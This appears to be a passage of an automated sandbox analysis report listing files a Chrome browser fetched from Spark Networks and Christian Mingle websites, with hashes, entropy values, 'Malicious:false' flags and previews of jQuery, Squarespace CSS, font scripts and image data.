                                                                                                                                                                                                                                                                                Preview:<!doctype html>.<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" >. <head>. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <meta name="viewport" content="width=device-width, initial-scale=1">. This is Squarespace. --> tomato-lion-m6jc -->.<base href="">.<meta charset="utf-8" />.<title>Services &mdash; Spark Networks</title>.<meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /><link rel="icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/de749afd-25b3-4000-88ee-3f3a2db2061b/favicon.ico?format=100w"/>.<link rel="canonical" href="https://www.spark.net/our-portfolio"/>.<meta property="og:site_name" content="Spark Networks"/>.<meta property="og:title" content="Services &mdash; Spark Networks"/>.<meta property="og:url" content="https://www.spark.net/our-portfolio"/>.<meta property="og:type" content="website"/>.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 212x238, components 3
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2362
                                                                                                                                                                                                                                                                                Entropy (8bit):7.096381852588978
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:K2ytjTg/Ps+mC8xzW2k56S7Nzzg+Ie0vBFe9R8HFX77:K2yZO0+zgW2jSxIPHF/
                                                                                                                                                                                                                                                                                MD5:60FB37D0EE453DA6BDD96E0041D634B5
                                                                                                                                                                                                                                                                                SHA1:A82C30C18F319E6FF3B19FB45FFF36D25D5F9A6D
                                                                                                                                                                                                                                                                                SHA-256:25217392952161CB6CA01342B588D251420BCE6401855834405CC2095A5A7C67
                                                                                                                                                                                                                                                                                SHA-512:6E3316334B22BDC86D57B335017EB09DC06FFFC0358D3EF5BA0BA456CE7E094FC2136CA90EA4823D7594764742BB54D84F628D0A55A30F4678BB7ED3C473289E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS-CpC8Hn1-mqQVqx4hgidv41U6-qw4uj7AZQ&usqp=CAU
                                                                                                                                                                                                                                                                                Preview:......JFIF.................................................$.(,..%...!1!%)+.0...?83,749.+...........+...++++++++++++++++++++++++++++++++++++++++++++++++++..........."........................................>.........................!..1AQaq.....#2br..."3CR....B...DSs........................................................?..@...................................................................................................<.H\[V..<..+..x.7.KZ..+...m.x.-I.........y..(~(.{X..M....5..W.Y....K.o.'&.Yu.r.........H....}.....e.c.....s{so..T...Ic.fN;K:.......~.NE.......................A...31t.....,.I.... ...._...vOc....n..'....}....i...o.....LZ.U.n..>....;....U.'..e....d_.Au|a.......8K..4|X..Ce..._.........t.:.....(UMq.....+d...B.. ................6.Gt...;4...Wxe.A...[...u.=(izK.R..9K.......'...~E[.t.Y'.\|lxs..|.;...D..m..{....O.,.:k.-.f=..g...........c..o...K......%.......T.......;...?|.a.W.q.n.....cHM.E.%.4.i...FU...v4.Ns..^[....../.xa........?.....T.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):88145
                                                                                                                                                                                                                                                                                Entropy (8bit):5.291106244832159
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                                                                                                                                                                                MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                                                                                                                                                                                SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                                                                                                                                                                                SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                                                                                                                                                                                SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://code.jquery.com/jquery-3.4.1.min.js
                                                                                                                                                                                                                                                                                Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1346942
                                                                                                                                                                                                                                                                                Entropy (8bit):4.8987873849272665
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:lo5lBpUPE4+dUL6RdUL6jUL6NL6JRfJSGC1Y8rO00Wrru2jg3Ak:lWg3Ak
                                                                                                                                                                                                                                                                                MD5:D02AF4BAF4207EB30DD633B9E705C8AE
                                                                                                                                                                                                                                                                                SHA1:41EFFB4F74158F2B648ECE5DBB0FD2A50F130DF6
                                                                                                                                                                                                                                                                                SHA-256:9B779D5ECF83CD84693239B81441A2ED503F49B14C362507D071F9AE575AB5C1
                                                                                                                                                                                                                                                                                SHA-512:8CD5352C824A69AF7D2395CB5D48CEE867951605364F950DE28B29768A425A67F3B909F1E3ACF238CDBBDAF1950F12E16142B959F50F3298B973812B870A916E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://static1.squarespace.com/static/versioned-site-css/65ddde819292aa47ed2c6d1d/8/5c5a519771c10ba3470d8101/65ddde819292aa47ed2c6d25/1567/site.css
                                                                                                                                                                                                                                                                                Preview::root{--white-hsl:0,0%,100%;--black-hsl:0,0%,0%;--safeLightAccent-hsl:204.39,79.49%,38.24%;--safeDarkAccent-hsl:204.39,79.49%,38.24%;--safeInverseAccent-hsl:0,0%,100%;--safeInverseLightAccent-hsl:0,0%,100%;--safeInverseDarkAccent-hsl:0,0%,100%;--accent-hsl:204.39,79.49%,38.24%;--lightAccent-hsl:240,10.53%,92.55%;--darkAccent-hsl:209.23,52.7%,70.98%}:root{--course-item-nav-text-color:hsla(var(--black-hsl),1);--tweak-blog-item-pagination-icon-color:hsla(var(--black-hsl),1);--tweak-summary-block-read-more-color-on-background:hsla(var(--black-hsl),1);--tweak-quote-block-source-color-on-background:hsla(var(--black-hsl),1);--paragraphSmallColor:hsla(var(--black-hsl),1);--list-section-simple-button-background-color:hsla(var(--safeDarkAccent-hsl),1);--gradientHeaderBorderColor:hsla(var(--black-hsl),1);--tweak-summary-block-header-text-color-on-background:hsla(var(--black-hsl),1);--solidHeaderDropShadowColor:hsla(var(--black-hsl),1);--tweak-blog-alternating-side-by-side-list-read-more-color:hsl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):89232
                                                                                                                                                                                                                                                                                Entropy (8bit):5.15322181389628
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:B3/BOpKMx4au+sKBCZToNm+NHwddcWLT8mJwsx4Lp6QZ:B3/0pKG4a8ICZToNm+NHwddcWLT8mJwp
                                                                                                                                                                                                                                                                                MD5:E5D134825478C5B3BF7A0347295106F3
                                                                                                                                                                                                                                                                                SHA1:AFE7E5E23CDBFF79E43C963B304EA4F6EADA096D
                                                                                                                                                                                                                                                                                SHA-256:32E457F3BFC7F102740B82FB11395502CB2AB830960C969CB8E7F13118E12624
                                                                                                                                                                                                                                                                                SHA-512:ECFB79561810296E14384B2530A3D4BBCFEB38A7CA96C35723FDE20676D2C3068CEF7392E6B24D3C14757A0A496B4887F983B0369E6C12EAE36A39AC335DC449
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-e755ccfc180e7a2ab623-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(()=>{var u={544791:(_,i,a)=>{var s={"./en.json":839132,"src/main/webapp/universal/node_modules/@sqs/i18n-cldr/packs/en.json":839132};function e(n){var r=o(n);return a(r)}function o(n){if(!a.o(s,n)){var r=new Error("Cannot find module '"+n+"'");throw r.code="MODULE_NOT_FOUND",r}return s[n]}e.keys=function(){return Object.keys(s)},e.resolve=o,_.exports=e,e.id=544791},839132:_=>{"use strict";_.exports=JSON.parse(`{"version":"1.8.3","cldr":"44.0.1","checksum":"9fa7a50e","language":"en","defaultTag":"en-Latn-US","scripts":{"Latn":{"strings":"E_Afar_Abkhazian_Achinese_Acoli_Adangme_Adyghe_Avestan_Tunisian Arabic_Afrikaans_Afrihili_Aghem_Ainu_Akan_Akkadian_Alabama_Aleut_Gheg Albanian_Southern Altai_Amharic_Aragonese_Old English_Angika_Arabic_Aramaic_Mapuche_Araona_Arapaho_Algerian Arabic_Najdi Arabic_Arawak_Moroccan Arabic_Egyptian Arabic_Assamese_Asu_American Sign Language_Asturian_Avaric_Kotava_Awadhi_Aymara_Azerbaijani_Bashkir_Baluchi_Balinese_Bavarian_Basaa_Bamun_Batak Toba_Ghomala_Belar
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1290), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1290
                                                                                                                                                                                                                                                                                Entropy (8bit):5.0061960284971
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:yUwIHK32rzjmVYjAZfyzDexPIiEJCI4tbFaIq36IlmKaPIBkxa2rmSNMQno1/yyW:0JMzjmM5CxwCTYxqwmZkqfrmSNMQo1yL
                                                                                                                                                                                                                                                                                MD5:44A5F68A690C01F4439A52AC7F630A82
                                                                                                                                                                                                                                                                                SHA1:D5AFE05631E626FDC44365A339128530F78B2826
                                                                                                                                                                                                                                                                                SHA-256:F4965EBFE3EB46E3D8FA8E9D71296D5B91F3C0F48333D953F0CC8C37619076F9
                                                                                                                                                                                                                                                                                SHA-512:501D6191DBD835C0A55805778A2601B5F3CCF98AC55787569D7253C9C813DE7A34BA2964B63346A8CC75D742D4D23B2E86233E355AE8945D156D97EB3ABCF32C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:var CherryJsCore={};!function(r){"use strict";CherryJsCore={name:"Cherry Js Core",version:"1.0.0",author:"Cherry Team",variable:{$document:r(document),$window:r(window),browser:r.browser,browser_supported:!0,security:window.cherry_ajax,loaded_assets:{script:window.wp_load_script,style:window.wp_load_style},ui_auto_init:"true"===window.ui_init_object.auto_init,ui_auto_target:window.ui_init_object.targets},status:{on_load:!1,is_ready:!1},init:function(){CherryJsCore.set_variable(),r(document).on("ready",CherryJsCore.ready),r(window).on("load",CherryJsCore.load)},set_variable:function(){CherryJsCore.variable.browser_supported=function(){var r=CherryJsCore.variable.browser,e={msie:[8]};for(var i in e)if("undefined"!==r.browser)for(var o in e[i])if(r.version<=e[i][o])return!1;return!0}()},ready:function(){CherryJsCore.status.is_ready=!0,CherryJsCore.expressions.widget_ui_init()},load:function(){CherryJsCore.status.on_load=!0},expressions:{widget_ui_init:function(){r(document).on("widget-add
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1280x850, components 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):68087
                                                                                                                                                                                                                                                                                Entropy (8bit):7.97529903295912
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:LGaLrXCh8XxAATjbRs2vAMh1xE1DzRmhAKaViMCuKARc:3PnxbTjjjxIYhubCuKARc
                                                                                                                                                                                                                                                                                MD5:C38B46548211DC0A01B864DE5360FF89
                                                                                                                                                                                                                                                                                SHA1:9945AE1DC96E0D5C4F1418537AC87EE7C1C1666E
                                                                                                                                                                                                                                                                                SHA-256:92DD595E4C12D25880298423D31B60D2826C57F8525E5CB6DEBB6C1C80388CB2
                                                                                                                                                                                                                                                                                SHA-512:3EE23E3C50D5281C5F600FC2C1CF314FD42F3439EE069F57821FB2C7D47882AD6E0A3C2A1E26485DDE0A11E3CC2FA976EA8865EB1B79BAC16EC1DD9AE133AFF9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......F.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:DFFA30EF47C311E7804DAC0C3AE69BEE" xmpMM:DocumentID="xmp.did:DFFA30F047C311E7804DAC0C3AE69BEE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DFFA30ED47C311E7804DAC0C3AE69BEE" stRef:documentID="xmp.did:DFFA30EE47C311E7804DAC0C3AE69BEE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................ $.' ",#..(7),01444.'9=82<.342...........2!.!2222222222222222
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (2258)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):17331
                                                                                                                                                                                                                                                                                Entropy (8bit):5.557311468425655
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:bJBI2hpIgIVsUGiRm4lIeU4iDFeFs2NdFJsQF+i:dBg7GiRm4X0JqsG7Ui
                                                                                                                                                                                                                                                                                MD5:84323021538FDE07424FFE521470E9FC
                                                                                                                                                                                                                                                                                SHA1:5CE000B5E0224D69B6BE16E3222775ABFF3D0049
                                                                                                                                                                                                                                                                                SHA-256:443D33422DB29E80060AA1DE97500F473AB520E10092CF0E57CBC658B03D25A9
                                                                                                                                                                                                                                                                                SHA-512:5D6A0BA386A7CBD07B33FEA4EA4622DA9C8D3754AB2FBE71CB45D639EE448829E76BF1935266085898CFD9627B299F6B21F3B0B66389BD5E20495FA372ED43EC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://use.typekit.net/ik/r4c2iE5whvE7q92DsccQgp5oyXTFNH4kat2jemtKNotfecvJXnX1IyvhF2jtFRZLFRmqZes852IowRqkjAIXFhmqwcwhZ2Bqe6MK2hyydY8yScblZe8DSeUypPGHf5A5MyMMeMw6MKGHf5h5MyMMeMS6MKGHf5-5MyMMeMX6MKGHf5E5MyMMegI6MTMgz0ffn3j.js
                                                                                                                                                                                                                                                                                Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * halyard-display:. * - http://typekit.com/eulas/00000000000000007735adb1. * - http://typekit.com/eulas/00000000000000007735adc9. * - http://typekit.com/eulas/00000000000000007735adb4. * - http://typekit.com/eulas/00000000000000007735adcc. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"646866","fi":[34661,34669,34662,34670],"fc":[{"id":34661,"family":"halyard-display","src":"https://use.typekit.net/af/272149/00000000000000007735adb1/30/{format}{?primer,subset_id,fvd,v}","descriptors":{"weight":"300","style":"normal","stretch":"normal","display":"auto","variable":false,"subset_id":2}},{"id":34669,"family":"halyard-display","src":"https://use.typ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):694
                                                                                                                                                                                                                                                                                Entropy (8bit):4.6340051542153535
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:KI+3GGyDjFyVh6oqOhazjfg2fczkwYF/A514DVwaf/T1F/A7QOO93aSLYJAVt:0qfFyVh6oqOhaMP95qDVweTASaSLMAVt
                                                                                                                                                                                                                                                                                MD5:780614C3AE22A82D60633674C9106CEE
                                                                                                                                                                                                                                                                                SHA1:23BDD57544FFE1EB9FDF5BD65E953BFA77B2FD24
                                                                                                                                                                                                                                                                                SHA-256:D6A2AD74960A07637799AC95D73B95E5013C83CED8C6C790E064F575330E5833
                                                                                                                                                                                                                                                                                SHA-512:73AD16D6FA8340761EC2240157304BA659E0833F337B5DA959342013A97B6F6B0727AF8BE1179D0C7C6ED9CFAE26557B77E79C7E6437A7E1D013E810C4CC38FD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://kengegame.web.app/kit-style.css
                                                                                                                                                                                                                                                                                Preview:type="text/css" id="core-notify">.notifyjs-corner {. position: fixed;. margin: 5px;. z-index: 1050;.}...notifyjs-corner .notifyjs-wrapper,..notifyjs-corner .notifyjs-container {. position: relative;. display: block;. height: inherit;. width: inherit;. margin: 3px;.}...notifyjs-wrapper {. z-index: 1;. position: absolute;. display: inline-block;. height: 0;. width: 0;.}...notifyjs-container {. display: none;. z-index: 1;. position: absolute;.}...notifyjs-hidable {. cursor: pointer;.}..[data-notify-text],[data-notify-html] {. position: relative;.}...notifyjs-arrow {. position: absolute;. z-index: 2;. width: 0;. height: 0;.}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8668)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8833
                                                                                                                                                                                                                                                                                Entropy (8bit):5.0631314208551395
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5BwzxsMCm1dJDl6hj8P6PEGnvfiZaLkYluY4pLyUJWZPeGz+nrFr:5BQoIJDlC8CPZnvrLkYluYTUuPeGzs
                                                                                                                                                                                                                                                                                MD5:43B1AA1EA2D73E79E9D45980C7920446
                                                                                                                                                                                                                                                                                SHA1:1BEF149AEDEAFFF7A797E799CFBA168BED0D6DC6
                                                                                                                                                                                                                                                                                SHA-256:9C7BD3DADF6EDC19D3B8876A8E2B0B0AE6B54F403D7E987EC82B041128CFDD35
                                                                                                                                                                                                                                                                                SHA-512:A32D0D5CA42DDADAF3C4CA3A2570D8BC372A3494503E72F9E80043A0F742FAFB083899D4F8E2EE73740FDD32409EC34A5D45D5A62B79C5160A4E28A3DE8BFD42
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*!.Waypoints - 4.0.0.Copyright . 2011-2015 Caleb Troughton.Licensed under the MIT license..https://github.com/imakewebthings/waypoints/blog/master/licenses.txt.*/.!function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this)
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (40035)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40215
                                                                                                                                                                                                                                                                                Entropy (8bit):5.341587059628471
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:Nxhq+vCSCsZ60ExRdoSNn+68vB9wWyBTxIbpYcyf0Kfy+z5h:NxZXZ/Ex3a9w+pY1f0X+zD
                                                                                                                                                                                                                                                                                MD5:31F89F7C3FCADC7AC9482862D28B2318
                                                                                                                                                                                                                                                                                SHA1:DB44A5BA2659381CE35B7BD28EB34BC46FAA4EE3
                                                                                                                                                                                                                                                                                SHA-256:B6E030AD2D4B16E1B747179F64E90A646D32D746986EC428AC26DB321C576B50
                                                                                                                                                                                                                                                                                SHA-512:AA04BB53C6D0655882E1328A31C0E211910959863D49BCE6825AF5F3653618F412D110AB4BE6173CB0A9DE6CE7F42C08F7BE5FA5042CD10041A7BB958AB02785
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[52730],{615921:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.MAIN_CONTENT=1,f.CONTENT_COLLECTION=1,f.PAGE=2,f.SPLASH_PAGE=3,f.CONTENT_ITEM=50,f.NOT_FOUND=100,f.ERROR=101,f.SEARCH=102,f.LOCK_SCREEN=103,f.POPUP_OVERLAY=104,f.PROTECTED_CONTENT=105,f.MEMBER_AREA_ACCESS_DENIED=106,f.PAYWALL=107,f.SHOW_CART=200,f.CHECKOUT=201,f.ORDER_CONFIRMED=202,f.DONATE=203,f.CONTRIBUTION_CONFIRMED=204,f.COMMERCE_CART_V2=205,f.SUBSCRIPTION_CONFIRMED=206,f.ORDER_RECEIVED=207,f.MEMBERSHIP_CONFIRMED=208,f.REVIEWS_REQUEST=209,f.DIGITAL_PRODUCT_COMPOSER_PREVIEW=210,f.ORDER_STATUS=211,f.NEWSLETTER_UNSUBSCRIBE=300,f.COMMERCE_EMAIL_PREVIEW=301,f.SSO_PAGE=400})(E||(E={}));var T=E;h.default=T,N.exports=h.default},795702:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.EXPIRED=1,f.PASTDUE=2,f.TRIAL=3,f.BETA=4,f.REMOVED=5,f.INTERNAL=6,f.COMP
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (5729), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):41902
                                                                                                                                                                                                                                                                                Entropy (8bit):5.182260931204472
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:jGoRS8AUN05ytGAmk5DDZxJWOndtpLZccnzvUjVMJrCwb6Iv5iOi+yXlG:DS8AV5ykAmk5fZDxdt94jSJrCO61X0
                                                                                                                                                                                                                                                                                MD5:77D8A46EC11924186FFF51BA1EDBB56B
                                                                                                                                                                                                                                                                                SHA1:925D2AAAD6FC13029770E8338671E26F072E550B
                                                                                                                                                                                                                                                                                SHA-256:DEC4FCF4184D39D156C9B74097FC8632C1BF08D2709D3778623F5CD1861B0A40
                                                                                                                                                                                                                                                                                SHA-512:26D37261F4A303F5CDD9244411DBEFF0D5D62C76DBA0D6036A9702FCDC0B7498C86AD0E45FD01B0D7FA9E600175DDC3F512159A676CB307A8C8D72B81797E0B4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/js/theme-script.js?ver=1.2.0
                                                                                                                                                                                                                                                                                Preview:/* UItoTop jQuery Plugin | Matt Varone | http://www.mattvarone.com/web-design/uitotop-jquery-plugin */..!function(n){n.fn.UItoTop=function(o){var e={text:"To Top",min:200,inDelay:600,outDelay:400,containerID:"toTop",containerHoverID:"toTopHover",scrollSpeed:1200,easingType:"linear"},t=n.extend(e,o),i="#"+t.containerID,a="#"+t.containerHoverID;n("body").append('<a href="#" id="'+t.containerID+'"><span>'+t.text+"</span></a>"),n(i).hide().on("click.UItoTop",function(){return n("html, body").animate({scrollTop:0},t.scrollSpeed,t.easingType),n("#"+t.containerHoverID,this).stop().animate({opacity:0},t.inDelay,t.easingType),!1}).hover(function(){n(a,this).stop().animate({opacity:1},600,"linear")},function(){n(a,this).stop().animate({opacity:0},700,"linear")}),n(window).scroll(function(){var o=n(window).scrollTop();"undefined"==typeof document.body.style.maxHeight&&n(i).css({position:"absolute",top:o+n(window).height()-50}),o>t.min?n(i).fadeIn(t.inDelay):n(i).fadeOut(t.Outdelay)})}}(jQuery);..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):9193
                                                                                                                                                                                                                                                                                Entropy (8bit):5.058820345357118
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:Xbr5ul0lG2Ywr+o53PsoSOBDP4l5EHIjgn7Bt1En7IeayvKOXpETqK:Xbr51l+o53PsoTDP4sugnM7s9
                                                                                                                                                                                                                                                                                MD5:63B27E66B6B47B9523E199CDD81AE663
                                                                                                                                                                                                                                                                                SHA1:18E1A1AA46F5EF2E6FB113ABBAC56F7962F5034D
                                                                                                                                                                                                                                                                                SHA-256:1FE913B24CFA0724F4292DB1745D7E4D816FBE08CE658AD17E657BD52892C686
                                                                                                                                                                                                                                                                                SHA-512:D9C381644884F17409DB1FCF71469A7928C9A8EB8AE3E45DAE9EF6A69D3B45E3D5ED8C8EBE98D9A1BD64A6443618683F02F6CE82FBD36E69CCD9611DC769F80D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.easypiechart.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:/**!. * easyPieChart. * Lightweight plugin to render simple, animated and retina optimized pie charts. *. * @license . * @author Robert Fleischmann <rendro87@gmail.com> (http://robert-fleischmann.de). * @version 2.1.5. **/..(function(root, factory) {. if(typeof exports === 'object') {. module.exports = factory(require('jquery'));. }. else if(typeof define === 'function' && define.amd) {. define(['jquery'], factory);. }. else {. factory(root.jQuery);. }.}(this, function($) {../**. * Renderer to render the chart on a canvas object. * @param {DOMElement} el DOM element to host the canvas (root of the plugin). * @param {object} options options object of the plugin. */.var CanvasRenderer = function(el, options) {..var cachedBackground;..var canvas = document.createElement('canvas');...el.appendChild(canvas);...if (typeof(G_vmlCanvasManager) !== 'undefined') {...G_vmlCanvasManager.initElement(canvas);..}...var ctx = canvas.getContext('2d');...c
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                                                                                                                Category:downloaded
